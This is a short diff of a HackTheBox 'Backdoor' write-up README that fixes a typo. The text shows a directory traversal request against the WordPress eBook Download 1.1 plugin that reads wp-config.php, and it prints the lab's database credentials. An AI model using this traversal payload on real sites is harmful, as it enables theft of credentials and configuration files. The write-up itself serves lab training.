x00tex/hackTheBox/Boxes/linux/Retired/backdoor/README.md

 And right off the bat found Directory Traversal vulnerability in WordPress Plugin eBook Download 1.1 from searchsploit.

-its smiply allowed file inclusion from `/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php`
+its simply allowed file inclusion from `/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php`

 with lfi, get the `wp-config.php` file and db creds: `wordpressuser:MQYBJSaD#DxG6qbm`.